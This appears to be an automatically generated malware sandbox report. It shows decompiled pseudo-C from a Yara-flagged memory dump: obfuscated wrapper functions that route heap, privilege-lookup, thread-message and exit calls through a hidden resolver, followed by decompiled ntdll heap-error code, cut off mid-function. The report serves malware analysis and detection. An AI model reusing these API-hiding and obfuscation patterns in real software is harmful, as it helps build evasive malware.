                                                                                                                				E0041C5F0( &_v68, 3);
                                                                                                                				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                                                                				_t13 = E00414E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                				_t25 = _t13;
                                                                                                                				if(_t25 != 0) {
                                                                                                                					_t21 = _a8;
                                                                                                                					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                                					_t32 = _t14;
                                                                                                                					if(_t14 == 0) {
                                                                                                                						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                					}
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				return _t13;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 0d1e36c289a0b53bdeed0d38a9a87e480687051d7683c9869489bfd4a45d3142
                                                                                                                • Instruction ID: 1c70ebe9c4587dd2a83d5b3b8a0bede6d40f176564795ec2817d5d4d7982e3b8
                                                                                                                • Opcode Fuzzy Hash: 0d1e36c289a0b53bdeed0d38a9a87e480687051d7683c9869489bfd4a45d3142
                                                                                                                • Instruction Fuzzy Hash: AD01FC31A8032877E720A6958D03FFF771C6B40F54F04401DFF04BA1C1E6A8690546FA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 46%
                                                                                                                			E0041A3AC(void* __ecx, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
                                                                                                                				intOrPtr _v0;
                                                                                                                				int _t10;
                                                                                                                				void* _t16;
                                                                                                                
                                                                                                                				asm("cli");
                                                                                                                				asm("xlatb");
                                                                                                                				asm("rcl byte [ebp-0x75], cl");
                                                                                                                				_t7 = _v0;
                                                                                                                				E0041AB40(_t16, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                                                                                                                				_t10 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                                                                                                                				return _t10;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1B2,0040F1B2,0000003C,00000000,?,00409D45), ref: 0041A3E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: 6aa8a1a0eddbdd748abf7a29f480667169de18ddd140b9ce29789d84d8d5424b
                                                                                                                • Instruction ID: 50a0093dd2b6d3a697e29d991812daf9f8b34c3453e5e84667064f005861b796
                                                                                                                • Opcode Fuzzy Hash: 6aa8a1a0eddbdd748abf7a29f480667169de18ddd140b9ce29789d84d8d5424b
                                                                                                                • Instruction Fuzzy Hash: E3E092B12002047BDB20DF55CC40EDB77699F85250F008159FA0D97241C534A8108BB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A250(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                				char _t10;
                                                                                                                				void* _t15;
                                                                                                                
                                                                                                                				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                				E0041AB40(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                				return _t10;
                                                                                                                			}





                                                                                                                0x0041a25f
                                                                                                                0x0041a267
                                                                                                                0x0041a27d
                                                                                                                0x0041a281

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A27D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                • Instruction ID: ee3aa041e972e1580d2f30967c3c9a2bcee9683d3d67cd51b15d6bd94af8f81d
                                                                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                • Instruction Fuzzy Hash: BEE046B1200208ABDB18EF99CC49EE777ADEF88760F018559FE095B242C630F910CAF0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A210(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                				long _t9;
                                                                                                                				void* _t10;
                                                                                                                				void* _t12;
                                                                                                                				long _t13;
                                                                                                                				void* _t15;
                                                                                                                
                                                                                                                				E0041AB40(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                				_t13 = _a16;
                                                                                                                				_t9 = _a12;
                                                                                                                				_t12 = _a8;
                                                                                                                				_t10 = RtlAllocateHeap(_t12, _t9, _t13); // executed
                                                                                                                				return _t10;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00414516,?,00414C8F,00414C8F,?,00414516,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A23D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                • Instruction ID: 447e7a220df12b1cedfda995ac5eefb5f8fdfd8f8e9865071670fb4112bd08d3
                                                                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                • Instruction Fuzzy Hash: F8E012B1200208ABDB14EF99CC41EA777ADAF88664F118559BA095B242C630F9108AB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A3B0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                				int _t10;
                                                                                                                				void* _t15;
                                                                                                                
                                                                                                                				E0041AB40(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                				return _t10;
                                                                                                                			}





                                                                                                                0x0041a3ca
                                                                                                                0x0041a3e0
                                                                                                                0x0041a3e4

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1B2,0040F1B2,0000003C,00000000,?,00409D45), ref: 0041A3E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                • Instruction ID: 59391c5e11f167e5dbe23f0656a9380a297fcfa3b65dd95ded7aab8eafd70cc2
                                                                                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                • Instruction Fuzzy Hash: E3E01AB12002086BDB10DF49CC85EE777ADAF88650F018155BA0957241C934F8108BF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A290(intOrPtr _a4, int _a8) {
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t5 = _a4;
                                                                                                                				E0041AB40(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                				ExitProcess(_a8);
                                                                                                                			}




                                                                                                                0x0041a293
                                                                                                                0x0041a2aa
                                                                                                                0x0041a2b8

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                • Instruction ID: 0f5b6569f0fd1189fef647496f38c461ee85f3cd89d543d30868c9d99a5dee31
                                                                                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                • Instruction Fuzzy Hash: A5D017726042187BD620EB99CC85FD777ACDF487A0F0180A9BA1D6B242C535BA108AE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0041A282() {
                                                                                                                				void* _t14;
                                                                                                                				void* _t21;
                                                                                                                				void* _t22;
                                                                                                                				void* _t25;
                                                                                                                				void* _t26;
                                                                                                                
                                                                                                                				asm("pushad");
                                                                                                                				asm("loop 0xffffffe9");
                                                                                                                				asm("sahf");
                                                                                                                				 *((intOrPtr*)(_t14 + 0x1a638af8)) =  *((intOrPtr*)(_t14 + 0x1a638af8)) + _t22;
                                                                                                                				_pop(_t21);
                                                                                                                				_t25 = _t26;
                                                                                                                				_t11 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                				_push(_t22);
                                                                                                                				E0041AB40(_t21,  *((intOrPtr*)(_t25 + 8)),  *((intOrPtr*)(_t25 + 8)) + 0xc7c,  *((intOrPtr*)(_t11 + 0xa14)), 0, 0x36);
                                                                                                                				ExitProcess( *(_t25 + 0xc));
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A27D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 67%
                                                                                                                			E0041A243(long __eax, void* __edx, char _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                				intOrPtr* __esi;
                                                                                                                				signed int __ebp;
                                                                                                                				void* _t9;
                                                                                                                				void* _t10;
                                                                                                                				long _t12;
                                                                                                                
                                                                                                                				_push(cs);
                                                                                                                				_t12 = __edx + 1;
                                                                                                                				asm("int1");
                                                                                                                				if(_t12 >= 0) {
                                                                                                                					_t9 = RtlAllocateHeap(_t10, __eax, _t12); // executed
                                                                                                                					return _t9;
                                                                                                                				} else {
                                                                                                                					__esp =  *(__eax - 0x5d) * 0x27;
                                                                                                                					asm("movsb");
                                                                                                                					asm("aas");
                                                                                                                					asm("stosd");
                                                                                                                					_pop(__esp);
                                                                                                                					__ebp = __esp;
                                                                                                                					__eax = _a4;
                                                                                                                					_t4 = __eax + 0xc74; // 0xc74
                                                                                                                					__esi = _t4;
                                                                                                                					__eax = E0041AB40(__edi, _a4, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x35);
                                                                                                                					__edx = _a16;
                                                                                                                					__eax = _a12;
                                                                                                                					__edx =  *__esi;
                                                                                                                					__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                					__esi = __esi;
                                                                                                                					__ebp = __ebp;
                                                                                                                					return __eax;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00414516,?,00414C8F,00414C8F,?,00414516,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A23D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Strings
                                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 012AB2DC
                                                                                                                • The resource is owned shared by %d threads, xrefs: 012AB37E
                                                                                                                • *** Inpage error in %ws:%s, xrefs: 012AB418
                                                                                                                • a NULL pointer, xrefs: 012AB4E0
                                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 012AB2F3
                                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 012AB352
                                                                                                                • The instruction at %p tried to %s , xrefs: 012AB4B6
                                                                                                                • <unknown>, xrefs: 012AB27E, 012AB2D1, 012AB350, 012AB399, 012AB417, 012AB48E
                                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012AB38F
                                                                                                                • *** then kb to get the faulting stack, xrefs: 012AB51C
                                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 012AB53F
                                                                                                                • read from, xrefs: 012AB4AD, 012AB4B2
                                                                                                                • This failed because of error %Ix., xrefs: 012AB446
                                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 012AB484
                                                                                                                • The resource is owned exclusively by thread %p, xrefs: 012AB374
                                                                                                                • Go determine why that thread has not released the critical section., xrefs: 012AB3C5
                                                                                                                • *** enter .cxr %p for the context, xrefs: 012AB50D
                                                                                                                • an invalid address, %p, xrefs: 012AB4CF
                                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 012AB47D
                                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 012AB476
                                                                                                                • write to, xrefs: 012AB4A6
                                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 012AB48F
                                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012AB3D6
                                                                                                                • The critical section is owned by thread %p., xrefs: 012AB3B9
                                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 012AB323
                                                                                                                • *** enter .exr %p for the exception record, xrefs: 012AB4F1
                                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 012AB314
                                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 012AB305
                                                                                                                • The instruction at %p referenced memory at %p., xrefs: 012AB432
                                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 012AB39B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • API String ID: 0-108210295
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E012B1C06() {
                                                                                                                				signed int _t27;
                                                                                                                				char* _t104;
                                                                                                                				char* _t105;
                                                                                                                				intOrPtr _t113;
                                                                                                                				intOrPtr _t115;
                                                                                                                				intOrPtr _t117;
                                                                                                                				intOrPtr _t119;
                                                                                                                				intOrPtr _t120;
                                                                                                                
                                                                                                                				_t105 = 0x11d48a4;
                                                                                                                				_t104 = "HEAP: ";
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                					_push(_t104);
                                                                                                                					E011FB150();
                                                                                                                				} else {
                                                                                                                					E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                				}
                                                                                                                				_push( *0x12e589c);
                                                                                                                				E011FB150("Heap error detected at %p (heap handle %p)\n",  *0x12e58a0);
                                                                                                                				_t27 =  *0x12e5898; // 0x0
                                                                                                                				if(_t27 <= 0xf) {
                                                                                                                					switch( *((intOrPtr*)(_t27 * 4 +  &M012B1E96))) {
                                                                                                                						case 0:
                                                                                                                							_t105 = "heap_failure_internal";
                                                                                                                							goto L21;
                                                                                                                						case 1:
                                                                                                                							goto L21;
                                                                                                                						case 2:
                                                                                                                							goto L21;
                                                                                                                						case 3:
                                                                                                                							goto L21;
                                                                                                                						case 4:
                                                                                                                							goto L21;
                                                                                                                						case 5:
                                                                                                                							goto L21;
                                                                                                                						case 6:
                                                                                                                							goto L21;
                                                                                                                						case 7:
                                                                                                                							goto L21;
                                                                                                                						case 8:
                                                                                                                							goto L21;
                                                                                                                						case 9:
                                                                                                                							goto L21;
                                                                                                                						case 0xa:
                                                                                                                							goto L21;
                                                                                                                						case 0xb:
                                                                                                                							goto L21;
                                                                                                                						case 0xc:
                                                                                                                							goto L21;
                                                                                                                						case 0xd:
                                                                                                                							goto L21;
                                                                                                                						case 0xe:
                                                                                                                							goto L21;
                                                                                                                						case 0xf:
                                                                                                                							goto L21;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L21:
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                					_push(_t104);
                                                                                                                					E011FB150();
                                                                                                                				} else {
                                                                                                                					E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                				}
                                                                                                                				_push(_t105);
                                                                                                                				E011FB150("Error code: %d - %s\n",  *0x12e5898);
                                                                                                                				_t113 =  *0x12e58a4; // 0x0
                                                                                                                				if(_t113 != 0) {
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push(_t104);
                                                                                                                						E011FB150();
                                                                                                                					} else {
                                                                                                                						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					E011FB150("Parameter1: %p\n",  *0x12e58a4);
                                                                                                                				}
                                                                                                                				_t115 =  *0x12e58a8; // 0x0
                                                                                                                				if(_t115 != 0) {
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push(_t104);
                                                                                                                						E011FB150();
                                                                                                                					} else {
                                                                                                                						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					E011FB150("Parameter2: %p\n",  *0x12e58a8);
                                                                                                                				}
                                                                                                                				_t117 =  *0x12e58ac; // 0x0
                                                                                                                				if(_t117 != 0) {
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push(_t104);
                                                                                                                						E011FB150();
                                                                                                                					} else {
                                                                                                                						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					E011FB150("Parameter3: %p\n",  *0x12e58ac);
                                                                                                                				}
                                                                                                                				_t119 =  *0x12e58b0; // 0x0
                                                                                                                				if(_t119 != 0) {
                                                                                                                					L41:
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push(_t104);
                                                                                                                						E011FB150();
                                                                                                                					} else {
                                                                                                                						E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					_push( *0x12e58b4);
                                                                                                                					E011FB150("Last known valid blocks: before - %p, after - %p\n",  *0x12e58b0);
                                                                                                                				} else {
                                                                                                                					_t120 =  *0x12e58b4; // 0x0
                                                                                                                					if(_t120 != 0) {
                                                                                                                						goto L41;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                					_push(_t104);
                                                                                                                					E011FB150();
                                                                                                                				} else {
                                                                                                                					E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                				}
                                                                                                                				return E011FB150("Stack trace available at %p\n", 0x12e58c0);
                                                                                                                			}












                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                • API String ID: 0-2897834094
                                                                                                                • Opcode ID: 47de776ce7d7a79505392b73ef52c12438ccdfe3e0bfd3b29d44d835e78ca444
                                                                                                                • Instruction ID: 1b75f567f3c2b031326d50b6ed42029239e346f71c1b03f8d9751d2a317c8d9f
                                                                                                                • Opcode Fuzzy Hash: 47de776ce7d7a79505392b73ef52c12438ccdfe3e0bfd3b29d44d835e78ca444
                                                                                                                • Instruction Fuzzy Hash: C561D737539546DFD619AB85F5EDE6073E4EB04B64B0D806EF6096B302D77098908F0A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E01203D34(signed int* __ecx) {
                                                                                                                				signed int* _v8;
                                                                                                                				char _v12;
                                                                                                                				signed int* _v16;
                                                                                                                				signed int* _v20;
                                                                                                                				char _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				char _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int* _v48;
                                                                                                                				signed int* _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				char _v68;
                                                                                                                				signed int _t140;
                                                                                                                				signed int _t161;
                                                                                                                				signed int* _t236;
                                                                                                                				signed int* _t242;
                                                                                                                				signed int* _t243;
                                                                                                                				signed int* _t244;
                                                                                                                				signed int* _t245;
                                                                                                                				signed int _t255;
                                                                                                                				void* _t257;
                                                                                                                				signed int _t260;
                                                                                                                				void* _t262;
                                                                                                                				signed int _t264;
                                                                                                                				void* _t267;
                                                                                                                				signed int _t275;
                                                                                                                				signed int* _t276;
                                                                                                                				short* _t277;
                                                                                                                				signed int* _t278;
                                                                                                                				signed int* _t279;
                                                                                                                				signed int* _t280;
                                                                                                                				short* _t281;
                                                                                                                				signed int* _t282;
                                                                                                                				short* _t283;
                                                                                                                				signed int* _t284;
                                                                                                                				void* _t285;
                                                                                                                
                                                                                                                				_v60 = _v60 | 0xffffffff;
                                                                                                                				_t280 = 0;
                                                                                                                				_t242 = __ecx;
                                                                                                                				_v52 = __ecx;
                                                                                                                				_v8 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v40 = 0;
                                                                                                                				_v28 = 0;
                                                                                                                				_v32 = 0;
                                                                                                                				_v44 = 0;
                                                                                                                				_v56 = 0;
                                                                                                                				_t275 = 0;
                                                                                                                				_v16 = 0;
                                                                                                                				if(__ecx == 0) {
                                                                                                                					_t280 = 0xc000000d;
                                                                                                                					_t140 = 0;
                                                                                                                					L50:
                                                                                                                					 *_t242 =  *_t242 | 0x00000800;
                                                                                                                					_t242[0x13] = _t140;
                                                                                                                					_t242[0x16] = _v40;
                                                                                                                					_t242[0x18] = _v28;
                                                                                                                					_t242[0x14] = _v32;
                                                                                                                					_t242[0x17] = _t275;
                                                                                                                					_t242[0x15] = _v44;
                                                                                                                					_t242[0x11] = _v56;
                                                                                                                					_t242[0x12] = _v60;
                                                                                                                					return _t280;
                                                                                                                				}
                                                                                                                				if(E01201B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                                					_v56 = 1;
                                                                                                                					if(_v8 != 0) {
                                                                                                                						L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                                                					}
                                                                                                                					_v8 = _t280;
                                                                                                                				}
                                                                                                                				if(E01201B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                                					_v60 =  *_v8;
                                                                                                                					L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                                                					_v8 = _t280;
                                                                                                                				}
                                                                                                                				if(E01201B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                					L16:
                                                                                                                					if(E01201B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                						L28:
                                                                                                                						if(E01201B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                                							L46:
                                                                                                                							_t275 = _v16;
                                                                                                                							L47:
                                                                                                                							_t161 = 0;
                                                                                                                							L48:
                                                                                                                							if(_v8 != 0) {
                                                                                                                								L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                                                							}
                                                                                                                							_t140 = _v20;
                                                                                                                							if(_t140 != 0) {
                                                                                                                								if(_t275 != 0) {
                                                                                                                									L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                                                									_t275 = 0;
                                                                                                                									_v28 = 0;
                                                                                                                									_t140 = _v20;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L50;
                                                                                                                						}
                                                                                                                						_t167 = _v12;
                                                                                                                						_t255 = _v12 + 4;
                                                                                                                						_v44 = _t255;
                                                                                                                						if(_t255 == 0) {
                                                                                                                							_t276 = _t280;
                                                                                                                							_v32 = _t280;
                                                                                                                						} else {
                                                                                                                							_t276 = L01214620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                                                							_t167 = _v12;
                                                                                                                							_v32 = _t276;
                                                                                                                						}
                                                                                                                						if(_t276 == 0) {
                                                                                                                							_v44 = _t280;
                                                                                                                							_t280 = 0xc0000017;
                                                                                                                							goto L46;
                                                                                                                						} else {
                                                                                                                							E0123F3E0(_t276, _v8, _t167);
                                                                                                                							_v48 = _t276;
                                                                                                                							_t277 = E01241370(_t276, 0x11d4e90);
                                                                                                                							_pop(_t257);
                                                                                                                							if(_t277 == 0) {
                                                                                                                								L38:
                                                                                                                								_t170 = _v48;
                                                                                                                								if( *_v48 != 0) {
                                                                                                                									E0123BB40(0,  &_v68, _t170);
                                                                                                                									if(L012043C0( &_v68,  &_v24) != 0) {
                                                                                                                										_t280 =  &(_t280[0]);
                                                                                                                									}
                                                                                                                								}
                                                                                                                								if(_t280 == 0) {
                                                                                                                									_t280 = 0;
                                                                                                                									L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                                                									_v44 = 0;
                                                                                                                									_v32 = 0;
                                                                                                                								} else {
                                                                                                                									_t280 = 0;
                                                                                                                								}
                                                                                                                								_t174 = _v8;
                                                                                                                								if(_v8 != 0) {
                                                                                                                									L012177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                                                								}
                                                                                                                								_v8 = _t280;
                                                                                                                								goto L46;
                                                                                                                							}
                                                                                                                							_t243 = _v48;
                                                                                                                							do {
                                                                                                                								 *_t277 = 0;
                                                                                                                								_t278 = _t277 + 2;
                                                                                                                								E0123BB40(_t257,  &_v68, _t243);
                                                                                                                								if(L012043C0( &_v68,  &_v24) != 0) {
